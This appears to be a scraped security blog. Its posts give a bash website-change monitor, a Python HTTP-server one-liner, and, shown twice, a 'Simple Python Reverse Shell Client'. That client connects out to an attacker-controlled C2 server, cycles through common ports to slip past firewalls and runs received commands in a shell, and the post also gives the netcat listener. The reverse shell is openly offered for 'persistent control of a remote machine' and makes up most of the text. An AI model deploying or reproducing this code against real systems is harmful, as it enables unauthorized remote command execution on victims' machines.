#!/bin/bash
#***********************************************
#* Author: mmyrick
#* Date Created: 20180531
#* Purpose: Monitor a website for signs of change
#* Environment: Works from OSX v10.13.4
#************************************************
##THIS MUST BE SET MANUALLY
#Download Page, Hash Page, and Assign Original MD5
curr=f9a38facacc54241e4028bd2d2108a8b
#BEGIN ENDLESS LOOP
while true; do
#Download webpage
/usr/bin/curl -s -o /tmp/blah.txt www.purple.com
#Sleep for 5 seconds so page can download
/bin/sleep 5
#Hash the page
new=$(/sbin/md5 /tmp/blah.txt | cut -f4 -d " ")
#/bin/echo $new
#Compare the two MD5 values
if [[ "$new" != "$curr" ]]
then
#PRINT ONLY IF Something Has Changed
/bin/echo "THE WEBPAGE HAS CHANGED"
/bin/echo "THE WEBPAGE HAS CHANGED"
/bin/echo "THE WEBPAGE HAS CHANGED"
/bin/echo "THE WEBPAGE HAS CHANGED"
/bin/echo "THE WEBPAGE HAS CHANGED"
fi
#Remove temp files
/bin/rm /tmp/blah.txt
#Get WebPage Once Every 5 Min
/bin/sleep 300
#Run Again
done
Thursday, May 31, 2018
Saturday, January 13, 2018
Simple Python HTTP Server
There are times when you'll need a simple way to transfer a file. The Python one liner below will start a web server from any directory by invoking the command below:
Python V2:
python -m SimpleHTTPServer 8080
Python V3:
python3 -m http.server 8080
Python V2:
python -m SimpleHTTPServer 8080
Python V3:
python3 -m http.server 8080
Friday, January 12, 2018
Simple Python Reverse Shell Client
You never know when you'll need persistent control of a remote machine. The script below can typically be used in conjunction with a C2 server you control running the following: nc -nv -l -p 21
nc -h (-n=don't resolve hostnames, -v=verbose, -l=listen, -p=port)
Print statements have been commented out below for your convenience.
#!/user/bin/env python -tt
#NECESSARY LIBS
import socket
import time
import subprocess
##BEGIN CONNECTION ROUTINE
#print "Starting Connection ..."
mysocket = socket.socket()
connected = False
##ATTEMPT TO CONNECT TO C2 SERVER
while not connected:
#FOR ATTEMPTING TO EVADE FIREWALL, REDUCE PORTS AS NECESSARY
for port in [21, 22, 80, 443]:
time.sleep(2)
try:
#print "Attempting Port:", port
##CHANGE IP BELOW TO YOUR C2 SERVER
mysocket.connect(("127.0.0.1", port)
except socket.error:
#print "Not Able To Connect"
continue
else:
#print "Connection Successful"
connected = True
break
##WE ARE NOW CONNECTED
while True:
commandrequested = mysocket.recv(1024)
prochandle = subprocess.Popen(commandrequested, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE, stdin=subprocess.PIPE)
##ALLOW PROGRAM TO SAFELY WAIT FOR ABOVE PROCESS TO COMPLETE
prochandle.wait()
results = prochandle.stdout.read() + prochandle.stderr.read()
mysocket.send(results)
Known Limitations:
1) send/recv have transfer limitations (~12k)
2) "cd" appears (it actually does) NOT to work as EACH command spawns a new shell
nc -h (-n=don't resolve hostnames, -v=verbose, -l=listen, -p=port)
Print statements have been commented out below for your convenience.
#!/user/bin/env python -tt
#NECESSARY LIBS
import socket
import time
import subprocess
##BEGIN CONNECTION ROUTINE
#print "Starting Connection ..."
mysocket = socket.socket()
connected = False
##ATTEMPT TO CONNECT TO C2 SERVER
while not connected:
#FOR ATTEMPTING TO EVADE FIREWALL, REDUCE PORTS AS NECESSARY
for port in [21, 22, 80, 443]:
time.sleep(2)
try:
#print "Attempting Port:", port
##CHANGE IP BELOW TO YOUR C2 SERVER
mysocket.connect(("127.0.0.1", port)
except socket.error:
#print "Not Able To Connect"
continue
else:
#print "Connection Successful"
connected = True
break
##WE ARE NOW CONNECTED
while True:
commandrequested = mysocket.recv(1024)
prochandle = subprocess.Popen(commandrequested, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE, stdin=subprocess.PIPE)
##ALLOW PROGRAM TO SAFELY WAIT FOR ABOVE PROCESS TO COMPLETE
prochandle.wait()
results = prochandle.stdout.read() + prochandle.stderr.read()
mysocket.send(results)
Known Limitations:
1) send/recv have transfer limitations (~12k)
2) "cd" appears (it actually does) NOT to work as EACH command spawns a new shell
Subscribe to:
Posts (Atom)